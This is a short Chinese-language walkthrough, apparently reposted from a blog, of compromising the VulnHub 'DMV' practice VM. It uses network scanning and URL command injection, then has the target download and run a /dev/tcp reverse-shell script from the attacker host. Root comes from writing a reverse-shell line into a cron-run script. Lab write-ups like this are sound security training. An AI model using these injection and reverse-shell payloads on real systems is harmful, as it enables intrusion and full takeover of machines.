vulnhub之DMV的实践
2023-2-5 20:34:19 Author: 云计算和网络安全技术实践(查看原文) 阅读量:14 收藏

今天实践的是vulnhub的DMV镜像,

下载地址,https://download.vulnhub.com/dmv/DMV.ova,

先是用workstation导入,做地址扫描没扫到地址,

于是又用virtualbox导入,重新做地址扫描,

sudo netdiscover -r 192.168.0.0/24,这回有地址了,193就是,

再继续做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.0.193,

有web服务,浏览器访问http://192.168.0.193,

这是个有特殊漏洞的服务,能够执行通过url提交的命令,

用burp suite更改输入,--exec%3c`ls${IFS}-la`,

注意不是单引号,而是反单引号,

从响应中能看到命令执行的效果,

在kali攻击机上造一个shell脚本文件,并开启http下载服务,

echo "0<&150-;exec 150<>/dev/tcp/192.168.0.192/4444;sh <&150 >&150 2>&150" > shell.sh,

继续用burp suite更改输入,

--exec%3c`wget${IFS}http://192.168.0.192:8000/shell.sh`,


在kali攻击机上开个反弹shell监听,nc -lvp 4444,

再次用burp suite更改输入,--exec%3c`bash${IFS}shell.sh`,

反弹shell这就过来了,

转成交互式shell,python -c 'import pty; pty.spawn("/bin/sh")',

发现了一个定时执行的shell脚本,向里面写入反弹shell命令,

echo "bash -i >& /dev/tcp/192.168.0.192/8888 0>&1" > clean.sh,

在kali攻击机上重新开一个反弹shell监听,nc -lvp 8888,

稍等一会儿,新的反弹shell就过来了,id一下,确认是root,


文章来源: http://mp.weixin.qq.com/s?__biz=MzA3MjM5MDc2Nw==&mid=2650747426&idx=1&sn=8933420c08728b890804355e7d6b9d08&chksm=87149322b0631a34409cc7cf85125c108c8c88f99e9fc847d1e3459f680114841d75a89716a5#rd
如有侵权请联系:admin#unsafe.sh